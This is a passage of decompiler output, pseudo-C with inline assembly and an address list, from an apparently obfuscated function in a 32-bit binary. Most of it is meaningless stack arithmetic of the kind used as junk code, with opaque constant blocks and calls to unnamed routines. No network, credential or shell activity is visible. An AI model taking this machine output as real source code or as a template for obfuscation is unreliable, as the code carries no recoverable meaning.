												 *(_t1816 - 0x145) = _t1258;
												 *((intOrPtr*)(_t1816 - 0xbc)) = 0x40;
												 *(_t1816 - 0xb8) = 1;
												 *(_t1816 - 0x104) = _t1731;
												 *(_t1816 - 0xd5) = _t1731;
												 *(_t1816 - 0xd0) = 1;
												 *(_t1816 - 0x180) = 0x1b14;
												 *(_t1816 - 0x1f4) = 0x11b13;
												__eflags = _t1610 - 1;
												if(_t1610 < 1) {
													 *((char*)(_t1816 - 0xec)) =  *((char*)(_t1816 - 0xec)) - 1;
													__eflags = _t1610 - 1;
													 *(_t1816 - 0xd0) = 0;
												}
												asm("movups xmm0, [ebp-0x2c]");
												asm("sbb eax, eax");
												__eflags = _t1610 - 1;
												 *(_t1816 - 0x170) = 0x11b14;
												_t1611 = 0x10;
												asm("sbb eax, eax");
												asm("movq [ebp-0x1c], xmm0");
												asm("psrldq xmm0, 0x8");
												 *(_t1816 - 0x120) = 0x11b15;
												_t1264 =  *(_t1816 - 0x136) + 1;
												__eflags = _t1264;
												asm("movd [ebp-0x14], xmm0");
												 *(_t1816 - 0x136) = _t1264;
												 *(_t1816 - 0x1c8) = _t1264;
												_t1265 = _t1816 - 0x2c;
												do {
													 *_t1265 = 0;
													_t1265 = _t1265 + 1;
													_t1611 = _t1611 - 1;
													__eflags = _t1611;
												} while (_t1611 != 0);
												_t1612 =  *(_t1816 - 0x120);
												 *(_t1816 - 0x108) = ( *(_t1816 - 0x130) & 0x000000ff) * _t1612;
												 *((intOrPtr*)(_t1816 - 0xb4)) = _t1816 - 0x1c;
												__eflags = 0x6b16 - ( *(_t1816 - 0xed) & 0x000000ff);
												if(0x6b16 <= ( *(_t1816 - 0xed) & 0x000000ff)) {
													 *(_t1816 - 0xbd) =  *(_t1816 - 0x12d);
												} else {
													_t1397 =  *((intOrPtr*)(_t1816 - 0xc1)) - 1;
													_t1522 = _t1612 + _t1612;
													 *((char*)(_t1816 - 0xc1)) = _t1397;
													 *((char*)(_t1816 - 0x154)) = _t1397;
													 *(_t1816 - 0xbd) = _t1522;
													 *(_t1816 - 0x12d) = _t1522;
													 *((intOrPtr*)(_t1816 - 0x1d4)) = 0x1ace;
													 *((short*)(_t1816 - 0x1ee)) = 0x1ace;
												}
												_t1271 =  *(_t1816 - 0x1c6);
												 *(_t1816 - 0x13a) = _t1271;
												_t1807 = (_t1271 & 0x0000ffff) -  *(_t1816 - 0x170) + 0x4e2;
												_t1512 =  *(_t1816 - 0xf4);
												 *(_t1816 - 0xd6) = _t1731 + 1 +  *((intOrPtr*)(_t1816 - 0xe1));
												 *((intOrPtr*)(_t1816 - 0x9c)) = _t1816 - 0x3c;
												 *(_t1816 - 0xb0) = 0xc;
												_t1613 = _t1612 + ( *(_t1816 - 0xc5) & 0x000000ff) - 1;
												 *(_t1816 - 0x140) = _t1807;
												 *(_t1816 - 0x100) = _t1613;
												 *(_t1816 - 0x20c) =  *(_t1816 - 0x20c) + 0x7b40;
												 *(_t1816 - 0x98) = 0x10;
												 *((char*)(_t1816 - 0x153)) = 1;
												 *(_t1816 - 0xa0) = 0x10;
												 *(_t1816 - 0xc4) = _t1512;
												_t1732 = 0x4e2 +  *(_t1816 - 0x170) * 4;
												 *(_t1816 - 0xe0) = _t1732;
												 *((intOrPtr*)(_t1816 - 0xa4)) = _t1816 - 0x4c;
												 *(_t1816 - 0xf0) = _t1732 + 1;
												__eflags = _t1807;
												if(_t1807 != 0) {
													L83:
													_t1513 = _t1512 - 2;
													_t1282 =  *(_t1816 - 0xe6) + 1;
													 *(_t1816 - 0xf2) = _t1513;
													 *(_t1816 - 0x104) = _t1282;
													 *(_t1816 - 0xd5) = _t1282;
													_t615 = _t1816 - 0x1a8;
													 *_t615 =  *(_t1816 - 0x1a8) + 1;
													__eflags =  *_t615;
													 *(_t1816 - 0x20c) =  *(_t1816 - 0x284) + 1 + _t1613;
												} else {
													__eflags =  *(_t1816 - 0x114);
													if( *(_t1816 - 0x114) != 0) {
														goto L83;
													} else {
														_t1513 =  *(_t1816 - 0xf2);
													}
												}
												_t1287 =  *((intOrPtr*)(_t1816 - 0x1cc)) + 0xffff;
												 *(_t1816 - 0xc0) = _t1513;
												__eflags =  *(_t1816 - 0x184);
												asm("xorps xmm0, xmm0");
												 *(_t1816 - 0x84) = 1;
												 *((short*)(_t1816 - 0xe4)) = _t1287;
												 *((short*)(_t1816 - 0x1cc)) = _t1287;
												asm("movlpd [ebp-0x124], xmm0");
												if(__eflags < 0) {
													L96:
													_t1615 =  *(_t1816 - 0x108);
													goto L97;
												} else {
													if(__eflags > 0) {
														L87:
														_t1355 =  *(_t1816 - 0x1a8);
														 *((char*)(_t1816 - 0xe1)) = _t1355;
														_t1356 = _t1355 - 2;
														__eflags = _t1356;
														 *(_t1816 - 0xc5) = _t1356;
														 *(_t1816 - 0x114) =  *(_t1816 - 0x120);
														 *(_t1816 - 0x170) =  *(_t1816 - 0x124);
														while(1) {
															_push( *( *((intOrPtr*)(_t1816 - 0x188)) + 0x12) & 0x0000ffff);
															E00AE91E0( *( *((intOrPtr*)(_t1816 - 0x188)) + 0x12) & 0x0000ffff, _t1513,  *((intOrPtr*)(_t1773 + 0x34)), _t1816 - 0x74);
															_t1363 =  *(_t1816 - 0x1ac) + 5;
															 *(_t1816 - 0x1ac) = _t1363;
															 *(_t1816 - 0x1f6) = _t1363;
															_t1513 = _t1513 + 1;
															 *(_t1816 - 0xc0) = _t1513;
															 *(_t1816 - 0x1a6) =  *(_t1816 - 0x1a6) + 0x6095;
															_t1366 =  *((intOrPtr*)(_t1816 - 0xc1)) + 5;
															 *(_t1816 - 0xf2) = _t1513;
															 *((char*)(_t1816 - 0xc1)) = _t1366;
															 *((char*)(_t1816 - 0x154)) = _t1366;
															_t1368 =  *(_t1816 - 0x180) + 5;
															 *(_t1816 - 0x180) = _t1368;
															 *(_t1816 - 0x1f4) = _t1368;
															_t1370 =  *(_t1816 - 0xcc) + 0xffff;
															 *(_t1816 - 0xcc) = _t1370;
															 *(_t1816 - 0x280) = _t1370;
															 *(_t1816 - 0xed) =  *(_t1816 - 0xc5);
															 *(_t1816 - 0x100) = (_t1370 & 0x0000ffff) + (_t1370 & 0x0000ffff);
															_t1375 = E00AE47F0( *(_t1816 - 0x78), _t1816 - 0x2c, _t1773, _t1807,  *((intOrPtr*)(_t1773 + 0x34)),  *((intOrPtr*)(_t1773 + 0x40)), 0x100000, 0, _t1816 - 0x5c, _t1816 - 0x64,  *(_t1816 + 8), _t1816 - 0xbc);
															_t1826 = _t1826 + 0x24;
															__eflags = _t1375;
															if(_t1375 <= 0) {
																break;
															}
															 *((intOrPtr*)(_t1816 - 0x5c)) =  *((intOrPtr*)(_t1816 - 0x5c)) + 1;
															asm("adc dword [ebp-0x58], 0x0");
															_t1748 =  *(_t1816 - 0x104) + 1;
															_t1615 = ( *(_t1816 - 0x129) & 0x000000ff) -  *(_t1816 - 0xe0);
															 *((short*)(_t1816 - 0x1f8)) = ( *(_t1816 - 0xe5) & 0x000000ff) * ( *(_t1816 - 0x1a2) & 0x0000ffff);
															 *(_t1816 - 0x104) = _t1748;
															 *(_t1816 - 0xd5) = _t1748;
															 *(_t1816 - 0x1a4) = ( *(_t1816 - 0xdb) & 0x000000ff) -  *(_t1816 - 0x1a8);
															_t1732 =  *(_t1816 - 0xe0) - 1;
															_t1395 =  *(_t1816 - 0x170) + 1;
															 *(_t1816 - 0x108) = _t1615;
															 *(_t1816 - 0xe0) = _t1732;
															asm("adc dword [ebp-0x114], 0x0");
															__eflags =  *(_t1816 - 0x114) -  *(_t1816 - 0x184);
															_t1807 =  *(_t1816 - 0x140);
															 *(_t1816 - 0x170) = _t1395;
															if(__eflags < 0) {
																continue;
															} else {
																if(__eflags > 0) {
																	L97:
																	_t1808 = _t1807 - 1;
																	 *((short*)(_t1816 - 0x27e)) =  *(_t1816 - 0x208) - _t1807 +  *(_t1816 - 0x288);
																	_t1292 =  *(_t1816 - 0x190) & 0x0000ffff;
																	 *(_t1816 - 0x140) = _t1808;
																	 *(_t1816 - 0x120) = _t1292;
																	__eflags = _t1292;
																	if(_t1292 != 0) {
																		_t1810 =  *(_t1816 - 0x120);
																		_t1640 =  *(_t1816 - 0xd0);
																		 *(_t1816 - 0xc5) = _t1615 + _t1640;
																		_t1354 =  *(_t1816 - 0x284) & 0x0000ffff;
																		_t1519 =  *(_t1816 - 0xc5);
																		_t1642 = _t1640 - ( *(_t1816 - 0x284) & 0x0000ffff) - _t1732;
																		__eflags = _t1642;
																		 *(_t1816 - 0x100) = _t1642;
																		do {
																			_push(2);
																			_t1354 = E00AE91E0(_t1354, _t1519,  *((intOrPtr*)(_t1773 + 0x34)), _t1816 - 0x74);
																			_t1826 = _t1826 + 4;
																			 *(_t1816 - 0xd6) = _t1519;
																			_t1810 = _t1810 - 1;
																			__eflags = _t1810;
																		} while (_t1810 != 0);
																		_t1513 =  *(_t1816 - 0xc2);
																		_t1808 =  *(_t1816 - 0x140);
																	}
																	_t1617 = ( *(_t1816 - 0x1ca) & 0x0000ffff) + ( *(_t1816 - 0x20c) & 0x0000ffff);
																	_t1295 =  *(_t1816 - 0x1f4) + 1;
																	 *(_t1816 - 0xe0) = _t1617;
																	_t1733 = _t1295 & 0x0000ffff;
																	 *(_t1816 - 0x1f4) = _t1295;
																	__eflags =  *(_t1816 - 0x18c);
																	 *(_t1816 - 0x120) = _t1733;
																	if( *(_t1816 - 0x18c) == 0) {
																		_t1776 =  *((intOrPtr*)(_t1816 - 0xe4));
																		goto L110;
																	} else {
																		_t1321 =  *((intOrPtr*)(_t1816 - 0x20e));
																		 *(_t1816 - 0xcc) = _t1321;
																		 *(_t1816 - 0xe0) = (_t1321 & 0x0000ffff) - ( *(_t1816 - 0xbe) & 0x000000ff);
																		_t1329 = E00AE47F0( *(_t1816 - 0x78), _t1816 - 0x2c, _t1773, _t1808,  *((intOrPtr*)(_t1773 + 0x34)),  *((intOrPtr*)(_t1773 + 0x40)), ( *(_t1816 - 0x18c) & 0xfffffff0) + 0x10, 1, _t1816 - 0x5c, _t1816 - 0x64,  *(_t1816 + 8), _t1816 - 0xbc);
																		_t1776 =  *((intOrPtr*)(_t1816 - 0xe4)) +  *(_t1816 - 0x284);
																		 *((intOrPtr*)(_t1816 - 0x128)) =  *((intOrPtr*)(_t1816 - 0x128)) +  *(_t1816 - 0x20c);
																		 *((short*)(_t1816 - 0x1cc)) = _t1776;
																		 *(_t1816 - 0x14c) = ( *(_t1816 - 0xe6) & 0x000000ff) * ( *(_t1816 - 0x224) & 0x000000ff);
																		_t1742 =  *(_t1816 - 0x104) + 0xe8;
																		 *(_t1816 - 0x104) = _t1742;
																		 *(_t1816 - 0xd5) = _t1742;
																		__eflags = _t1329;
																		if(_t1329 > 0) {
																			_t1733 =  *(_t1816 - 0x120);
																			 *(_t1816 - 0x126) =  *(_t1816 - 0x126) + ( *(_t1816 - 0x12f) & 0x000000ff) + ( *(_t1816 - 0x12f) & 0x000000ff);
																			_t1617 =  *(_t1816 - 0xe0);
																			 *((char*)(_t1816 - 0x14b)) = ( *(_t1816 - 0x176) & 0x000000ff) * 0x29;
																			L110:
																			 *(_t1816 - 0x210) =  *(_t1816 - 0x210) + 4;
																			 *((char*)(_t1816 - 0x158)) =  *(_t1816 - 0xdc) + 4;
																			_t1301 =  *(_t1816 - 0x127) + 0x7c;
																			 *(_t1816 - 0xf2) = _t1513 + 1;
																			_t1515 =  *(_t1816 - 0x12a);
																			 *(_t1816 - 0xdc) = _t1301;
																			 *(_t1816 - 0x127) = _t1301;
																			_t1304 = ( *(_t1816 - 0x1a2) & 0x000000ff) +  *((intOrPtr*)(_t1816 - 0x27e)) + _t1515;
																			__eflags = _t1304;
																			 *(_t1816 - 0x1a8) = _t1617 -  *(_t1816 - 0x108);
																			 *(_t1816 - 0x143) = _t1304;
																			_t1619 = 0xc;
																			 *(_t1816 - 0x1c) = 0x1010101;
																			_t1305 = _t1816 - 0x1c;
																			 *(_t1816 - 0x18) = 0x1010101;
																			 *(_t1816 - 0x14) = 0x1010101;
																			 *((char*)(_t1816 - 0x14a)) = _t1733 -  *((intOrPtr*)(_t1816 - 0x175)) +  *((intOrPtr*)(_t1816 - 0x1cc));
																			do {
																				 *_t1305 = 0;
																				_t1305 = _t1305 + 1;
																				_t1619 = _t1619 - 1;
																				__eflags = _t1619;
																			} while (_t1619 != 0);
																			_t1621 = 0x10;
																			_t1737 = ( *(_t1816 - 0x1b0) & 0x0000ffff) - ( *(_t1816 - 0xbe) & 0x000000ff);
																			__eflags = _t1737;
																			_t1307 = _t1816 - 0x4c;
																			 *(_t1816 - 0xd0) = _t1737;
																			do {
																				 *_t1307 = 0;
																				_t1307 = _t1307 + 1;
																				_t1621 = _t1621 - 1;
																				__eflags = _t1621;
																			} while (_t1621 != 0);
																			_t1622 = 0x10;
																			_t1309 =  *(_t1816 - 0xdc) + 1;
																			__eflags = _t1309;
																			 *(_t1816 - 0x127) = _t1309;
																			_t1310 = _t1816 - 0x3c;
																			do {
																				 *_t1310 = 0;
																				_t1310 = _t1310 + 1;
																				_t1622 = _t1622 - 1;
																				__eflags = _t1622;
																			} while (_t1622 != 0);
																			asm("xorps xmm0, xmm0");
																			 *((char*)(_t1816 - 0x146)) =  *(_t1816 - 0xc6) - 1;
																			asm("movlpd [ebp-0xb4], xmm0");
																			 *((char*)(_t1816 - 0x155)) =  *(_t1816 - 0xe0) - _t1515;
																			asm("movlpd [ebp-0xac], xmm0");
																			 *(_t1816 - 0x1a8) = _t1776 - ( *(_t1816 - 0xc7) & 0x000000ff);
																			asm("movlpd [ebp-0xa4], xmm0");
																			asm("movlpd [ebp-0x9c], xmm0");
																			asm("movlpd [ebp-0x94], xmm0");
																			asm("movlpd [ebp-0x8c], xmm0");
																			asm("movlpd [ebp-0x84], xmm0");
																			 *((intOrPtr*)(_t1816 - 0xbc)) = 0x40;
																			 *(_t1816 - 0xb8) = 1;
																			 *(_t1816 - 0x1a2) = ( *(_t1816 - 0xf1) & 0x000000ff) + ( *(_t1816 - 0xbd) & 0x000000ff);
																			 *(_t1816 - 0xd8) = ( *(_t1816 - 0x1f6) & 0x000000ff) + _t1737;
																			L138:
																			_t1725 =  *(_t1816 - 0x2a8) & 0x0000ffff;
																			__eflags = _t1725;
																			if(_t1725 != 0) {
																				_t1590 =  *(_t1816 - 0x174);
																				_t1508 =  *(_t1816 - 0xc3);
																				do {
																					_t1590 = (_t1508 & 0x000000ff) * (_t1590 & 0x000000ff);
																					_t1193 =  *(_t1816 - 0xbf) + 0xeb;
																					_t1508 = _t1508 + (_t1508 << 2) << 2;
																					 *(_t1816 - 0xbf) = _t1193;
																					 *(_t1816 - 0x10b) = _t1590;
																					 *(_t1816 - 0xfa) = _t1193;
																					_t1725 = _t1725 - 1;
																					__eflags = _t1725;
																				} while (_t1725 != 0);
																				 *(_t1816 - 0x10c) = _t1508;
																			}
																			goto L142;
																		} else {
																			_t1631 = 0xc;
																			_t1334 = _t1816 - 0x1c;
																			do {
																				 *_t1334 = 0;
																				_t1334 = _t1334 + 1;
																				_t1631 = _t1631 - 1;
																				__eflags = _t1631;
																			} while (_t1631 != 0);
																			asm("xorps xmm0, xmm0");
																			_t1719 =  *(_t1816 - 0x100);
																			_t1780 = (_t1742 & 0x000000ff) + ( *(_t1816 - 0xc4) & 0x000000ff);
																			asm("movlpd [ebp-0xb4], xmm0");
																			asm("movlpd [ebp-0xac], xmm0");
																			_t1504 = ( *(_t1816 - 0x1d0) & 0x0000ffff) + ( *(_t1816 - 0x208) & 0x0000ffff) + 0x159a;
																			asm("movlpd [ebp-0xa4], xmm0");
																			asm("movlpd [ebp-0x9c], xmm0");
																			 *(_t1816 - 0x1ca) = ( *(_t1816 - 0xef) & 0x000000ff) + 1 + ( *(_t1816 - 0x177) & 0x000000ff) +  *(_t1816 - 0x108);
																			__eflags =  *(_t1816 - 0xf1) - 0x49;
																			_t1637 =  *(_t1816 - 0xd9);
																			asm("movlpd [ebp-0x94], xmm0");
																			asm("movlpd [ebp-0x8c], xmm0");
																			asm("movlpd [ebp-0x84], xmm0");
																			 *((intOrPtr*)(_t1816 - 0xbc)) = 0x40;
																			 *(_t1816 - 0xb8) = 1;
																			 *(_t1816 - 0x282) = ( *(_t1816 - 0xd7) & 0x000000ff) * ( *(_t1816 - 0xcc) & 0x0000ffff);
																			if( *(_t1816 - 0xf1) == 0x49) {
																				_t1743 = _t1719 + 1;
																				_t1504 = _t1780 * _t1743;
																				 *(_t1816 - 0x1ce) = ( *(_t1816 - 0xc0) & 0x000000ff) + _t1808;
																				_t1637 = _t1637 + 0xff;
																				_t1349 =  *((intOrPtr*)(_t1816 - 0x1d4)) + 1;
																				 *((intOrPtr*)(_t1816 - 0x1d4)) = _t1349;
																				 *((short*)(_t1816 - 0x1ee)) = _t1349;
																				_t1719 = _t1743 + 1;
																				__eflags = _t1719;
																				 *(_t1816 - 0x1c6) =  *(_t1816 - 0x13a) + 0xffff;
																			}
																			 *((char*)(_t1816 - 0x147)) = _t1637 - 1;
																			_t1774 = 0xffff;
																			 *((short*)(_t1816 - 0x286)) = ( *(_t1816 - 0x12a) & 0x000000ff) + _t1780 +  *(_t1816 - 0x1b0);
																		}
																	}
																} else {
																	__eflags = _t1395 -  *(_t1816 - 0x194);
																	if(_t1395 <  *(_t1816 - 0x194)) {
																		continue;
																	} else {
																		goto L97;
																	}
																}
															}
															goto L145;
														}
														_t1649 = 0xc;
														_t1376 = _t1816 - 0x1c;
														do {
															 *_t1376 = 0;
															_t1376 = _t1376 + 1;
															_t1649 = _t1649 - 1;
															__eflags = _t1649;
														} while (_t1649 != 0);
														asm("xorps xmm0, xmm0");
														_t1719 =  *(_t1816 - 0x100);
														_t1651 =  *(_t1816 - 0x140) + 0x7873;
														_t1774 = 0xffff;
														 *(_t1816 - 0x1d0) =  *(_t1816 - 0x1d0) + 0xffff;
														_t1504 =  *(_t1816 - 0xd0) + 0x564a;
														 *((char*)(_t1816 - 0x156)) =  *(_t1816 - 0xc7) + 1;
														 *(_t1816 - 0x1ca) =  *(_t1816 - 0x136);
														 *(_t1816 - 0x1a2) = _t1651 + 1;
														asm("movlpd [ebp-0xb4], xmm0");
														 *(_t1816 - 0x1a6) =  *(_t1816 - 0x20a) + 1;
														asm("movlpd [ebp-0xac], xmm0");
														asm("movlpd [ebp-0xa4], xmm0");
														 *(_t1816 - 0xd6) =  *((intOrPtr*)(_t1816 - 0xe1)) - _t1719 + _t1651;
														asm("movlpd [ebp-0x9c], xmm0");
														asm("movlpd [ebp-0x94], xmm0");
														asm("movlpd [ebp-0x8c], xmm0");
														asm("movlpd [ebp-0x84], xmm0");
														 *((intOrPtr*)(_t1816 - 0xbc)) = 0x40;
														 *(_t1816 - 0xb8) = 1;
														 *(_t1816 - 0x150) = 1;
														 *(_t1816 - 0xd8) = _t1651 + 2;
														 *(_t1816 - 0x149) =  *(_t1816 - 0xc9) - 1;
													} else {
														__eflags =  *(_t1816 - 0x194);
														if( *(_t1816 - 0x194) <= 0) {
															goto L96;
														} else {
															goto L87;
														}
													}
												}
											}
										} else {
											_t1719 = 0xfd - ( *(_t1816 - 0x210) & 0x0000ffff);
											 *((char*)(_t1816 - 0xec)) = 7;
											 *(_t1816 - 0x12d) =  *(_t1816 - 0x1ce) & 0x000000ff;
											 *(_t1816 - 0x208) = 0x4e2 -  *((intOrPtr*)(_t1816 - 0x286));
											 *(_t1816 - 0x150) = ( *(_t1816 - 0x1a2) & 0x000000ff) - 1;
											 *(_t1816 - 0x1f4) = ( *(_t1816 - 0xd8) & 0x000000ff) + 1 + _t1719 +  *(_t1816 - 0x114);
											goto L143;
										}
									}
								} else {
									 *((char*)(_t1816 - 0x155)) =  *((char*)(_t1816 - 0x155)) + 3;
									_t1719 = 0xfe;
									 *(_t1816 - 0x1f6) = 0x9894;
									_t1504 =  *(_t1816 - 0xd0) - 1;
									_t1774 = 0xffff;
								}
							} else {
								 *((short*)(_t1816 - 0x1f2)) = 0x159b;
								_t1719 = 0xff;
								_t1774 = 0xffff;
								 *(_t1816 - 0x1c6) = ( *(_t1816 - 0xd6) & 0x000000ff) +  *((intOrPtr*)(_t1816 - 0x27e));
								_t1504 = ( *(_t1816 - 0x1d0) & 0x0000ffff) - ( *(_t1816 - 0x1a6) & 0x0000ffff) + ( *(_t1816 - 0xf2) & 0x000000ff);
								 *((char*)(_t1816 - 0x147)) = ( *(_t1816 - 0xd7) & 0x000000ff) * ( *(_t1816 - 0x13c) & 0x000000ff);
							}
						} else {
							_t1774 = 0xffff;
							_t1719 = 0xfe;
							 *(_t1816 - 0x20a) =  *(_t1816 - 0x20a) + 0xffff;
							 *(_t1816 - 0xd8) =  *(_t1816 - 0xd8) + 0xc8;
							 *(_t1816 - 0xd6) =  *(_t1816 - 0xd6) + 0xfe;
							 *(_t1816 - 0x129) =  *(_t1816 - 0x129) << 6;
							 *((short*)(_t1816 - 0x1cc)) = ( *(_t1816 - 0xf1) & 0x000000ff) + ( *(_t1816 - 0x12c) & 0x000000ff);
							goto L144;
						}
					} else {
						__eflags =  *((intOrPtr*)(_t1816 - 0x1cc)) - 0xfe;
						if( *((intOrPtr*)(_t1816 - 0x1cc)) == 0xfe) {
							 *((short*)(_t1816 - 0x2c4)) = 0;
							_t1677 = ( *(_t1816 - 0x151) & 0x000000ff) * ( *(_t1816 - 0xe6) & 0x000000ff);
							__eflags = _t1677;
							 *((intOrPtr*)(_t1816 - 0x2e0)) = 0x3c260372;
							 *((intOrPtr*)(_t1816 - 0x2dc)) = 0x3e126222;
							 *((intOrPtr*)(_t1816 - 0x2d8)) = 0xa7a460a;
							 *((intOrPtr*)(_t1816 - 0x2d4)) = 0x46ba5914;
							 *((intOrPtr*)(_t1816 - 0x2d0)) = 0x12e229dd;
							 *((intOrPtr*)(_t1816 - 0x2cc)) = 0x7df81c77;
							 *((intOrPtr*)(_t1816 - 0x2c8)) = 0x11413a24;
							 *(_t1816 - 0x100) = _t1677;
							 *(_t1816 - 0xf2) = _t1677 + 2;
						}
						 *(_t1816 - 0x1ca) =  *(_t1816 - 0x104) & 0x000000ff;
						 *((char*)(_t1816 - 0x12b)) =  *(_t1816 - 0x1f6) + 0x1e +  *(_t1816 - 0x284);
						 *((short*)(_t1816 - 0x1f8)) =  *(_t1816 - 0x1a8) +  *(_t1816 - 0x280) +  *(_t1816 - 0x1f4);
						L142:
						_t1719 =  *(_t1816 - 0x100);
						L143:
						_t1774 = 0xffff;
						L144:
						_t1504 =  *(_t1816 - 0xd0);
					}
					L145:
					asm("movaps xmm0, [0xb0a1c0]");
					_t1574 = 0x10;
					_t1795 =  *((intOrPtr*)(_t1816 - 0x1d4));
					asm("movups [ebp-0x2c], xmm0");
					do {
						__eflags = _t1719 - _t1504;
						if(_t1719 > _t1504) {
							 *(_t1816 - 0xd6) =  *(_t1816 - 0x104) +  *((intOrPtr*)(_t1816 - 0x1c4)) + _t1719;
							_t1136 = ( *(_t1816 - 0x126) & 0x000000ff) +  *(_t1816 - 0x20c) + _t1795;
							__eflags = _t1136;
							 *(_t1816 - 0x1c6) = _t1136;
						}
						_t1574 = _t1574 - 1;
						__eflags = _t1574;
					} while (_t1574 != 0);
					__eflags =  *(_t1816 - 0xda) - _t1574;
					if( *(_t1816 - 0xda) == _t1574) {
						 *((intOrPtr*)(_t1816 - 0x2a4)) =  *((intOrPtr*)(_t1816 - 0x2a4)) + _t1774;
						 *(_t1816 - 0x220) = ( *(_t1816 - 0xc8) & 0x000000ff) +  *(_t1816 - 0x134);
						 *(_t1816 - 0x266) =  *((intOrPtr*)(_t1816 - 0x252)) -  *(_t1816 - 0x17c) +  *(_t1816 - 0x17c);
						 *(_t1816 - 0xf8) =  *(_t1816 - 0x16c) +  *(_t1816 - 0x16c) -  *(_t1816 - 0x118);
						_t1151 =  *((intOrPtr*)(_t1816 - 0x24c)) + 1 +  *((intOrPtr*)(_t1816 - 0x232));
						__eflags = _t1151;
						 *(_t1816 - 0x236) = _t1151;
					}
					_t1575 = 0x10;
					_t1137 = _t1816 - 0x2c;
					do {
						 *_t1137 = 0;
						_t1137 = _t1137 + 1;
						_t1575 = _t1575 - 1;
						__eflags = _t1575;
					} while (_t1575 != 0);
					E00AEEEA0(_t1137, _t1504,  *(_t1816 - 0x78), _t1774, _t1795);
					__eflags =  *(_t1816 - 8) ^ _t1816;
					return E00AF7B30( *(_t1816 - 8) ^ _t1816);
				} else {
					return E00AF7B30( *(_t1816 - 8) ^ _t1816);
				}
			}

















































































































































































































          0x00ae705a
          0x00ae705c
          0x00ae705d
          0x00ae705e
          0x00ae705f
          0x00ae7065
          0x00ae7067
          0x00ae706d
          0x00ae7082
          0x00ae7082
          0x00ae7088
          0x00ae708b
          0x00ae708d
          0x00ae708e
          0x00ae7091
          0x00ae7096
          0x00ae709b
          0x00ae709d
          0x00ae706f
          0x00ae706f
          0x00ae7073
          0x00ae7075
          0x00ae707a
          0x00ae707b
          0x00ae707c
          0x00ae707d
          0x00ae7080
          0x00000000
          0x00ae7081
          0x00ae707d
          0x00ae70aa
          0x00ae70b2
          0x00ae70bd
          0x00ae70c5
          0x00ae70cd
          0x00ae70d5
          0x00ae70dd
          0x00ae70e5
          0x00ae70f2
          0x00ae7100
          0x00ae7109
          0x00ae710f
          0x00ae7117
          0x00ae711f
          0x00ae7127
          0x00ae712f
          0x00ae7137
          0x00ae713d
          0x00ae7142
          0x00ae714a
          0x00ae7151
          0x00ae715c
          0x00ae7167
          0x00ae716e
          0x00ae7176
          0x00ae717e
          0x00ae7186
          0x00ae718d
          0x00ae719b
          0x00ae71a5
          0x00ae71ab
          0x00ae71b5
          0x00ae71be
          0x00ae71c4
          0x00ae71ce
          0x00ae71d8
          0x00ae71e1
          0x00ae71e8
          0x00ae71f2
          0x00ae71f8
          0x00ae7202
          0x00ae720c
          0x00ae7216
          0x00ae7220
          0x00ae722a
          0x00ae7234
          0x00ae723e
          0x00ae7248
          0x00ae7252
          0x00ae725c
          0x00ae7266
          0x00ae7270
          0x00ae7277
          0x00ae727e
          0x00ae7284
          0x00ae728d
          0x00ae7293
          0x00ae729c
          0x00ae72a1
          0x00ae72ae
          0x00ae72b5
          0x00ae72ba
          0x00ae72c7
          0x00ae72ce
          0x00ae72d3
          0x00ae72da
          0x00ae72e0
          0x00ae72e8
          0x00ae72ed
          0x00ae72f5
          0x00ae72fd
          0x00ae7305
          0x00ae730d
          0x00ae7314
          0x00ae731a
          0x00ae7322
          0x00ae732d
          0x00ae7334
          0x00ae733f
          0x00ae7347
          0x00ae734f
          0x00ae7356
          0x00ae735c
          0x00ae7361
          0x00ae7367
          0x00ae736c
          0x00ae7373
          0x00ae7379
          0x00ae7388
          0x00ae7390
          0x00ae7397
          0x00ae73a5
          0x00ae73ac
          0x00ae73b3
          0x00ae73c4
          0x00ae73cc
          0x00ae73ce
          0x00ae73dd
          0x00ae73ee
          0x00ae73f8
          0x00ae7402
          0x00ae740c
          0x00ae7416
          0x00ae741d
          0x00ae7423
          0x00ae742a
          0x00ae7433
          0x00ae743a
          0x00ae7444
          0x00ae744e
          0x00ae7458
          0x00ae7462
          0x00ae746c
          0x00ae7476
          0x00ae7480
          0x00ae7487
          0x00ae748d
          0x00ae7493
          0x00ae7499
          0x00ae74af
          0x00ae74b6
          0x00ae74bc
          0x00ae74c2
          0x00ae7590
          0x00ae759a
          0x00ae75a2
          0x00ae75b2
          0x00ae75b7
          0x00ae75b8
          0x00ae75b8
          0x00ae75bb
          0x00ae75c3
          0x00ae75c9
          0x00ae75cc
          0x00ae75d2
          0x00ae74c8
          0x00ae74df
          0x00ae74f4
          0x00ae74fc
          0x00ae7508
          0x00ae750f
          0x00ae7515
          0x00ae751c
          0x00ae7522
          0x00ae753c
          0x00ae753f
          0x00ae7549
          0x00ae7550
          0x00ae755a
          0x00ae7564
          0x00ae756e
          0x00ae7574
          0x00ae757a
          0x00ae7581
          0x00ae7581
          0x00ae75dc
          0x00ae75e2
          0x00ae75e3
          0x00ae75eb
          0x00ae75ee
          0x00ae75fc
          0x00ae7602
          0x00ae7609
          0x00ae760c
          0x00ae7612
          0x00ae7619
          0x00ae7629
          0x00ae7635
          0x00ae7637
          0x00ae763d
          0x00ae7643
          0x00ae7649
          0x00ae764f
          0x00ae7656
          0x00ae765c
          0x00ae7662
          0x00ae7664
          0x00ae768e
          0x00ae768e
          0x00ae7691
          0x00ae7692
          0x00ae7697
          0x00ae769c
          0x00ae769e
          0x00ae76a5
          0x00ae7666
          0x00ae7666
          0x00ae766b
          0x00ae7676
          0x00ae767c
          0x00ae7682
          0x00ae7682
          0x00ae7682
          0x00ae76c1
          0x00ae76cb
          0x00ae76d7
          0x00ae76de
          0x00ae76e2
          0x00ae76e4
          0x00ae76ee
          0x00ae76fc
          0x00ae7703
          0x00ae77a9
          0x00ae7709
          0x00ae7709
          0x00ae770c
          0x00ae771b
          0x00ae7720
          0x00ae7724
          0x00ae772b
          0x00ae7731
          0x00ae7740
          0x00ae7752
          0x00ae7758
          0x00ae7768
          0x00ae776f
          0x00ae777c
          0x00ae777e
          0x00ae7784
          0x00ae7791
          0x00ae7794
          0x00ae779a
          0x00ae779a
          0x00ae77c2
          0x00ae77ca
          0x00ae77cc
          0x00ae77d2
          0x00ae77de
          0x00ae77f0
          0x00ae77f2
          0x00ae77f8
          0x00ae77f8
          0x00ae77f8
          0x00ae7802
          0x00ae7808
          0x00ae7810
          0x00ae7816
          0x00ae7817
          0x00ae781a
          0x00ae781d
          0x00ae7820
          0x00ae7826
          0x00ae782d
          0x00ae782d
          0x00ae782d
          0x00ae7838
          0x00ae783e
          0x00ae7846
          0x00ae784c
          0x00ae784f
          0x00ae7851
          0x00ae789c
          0x00ae78a0
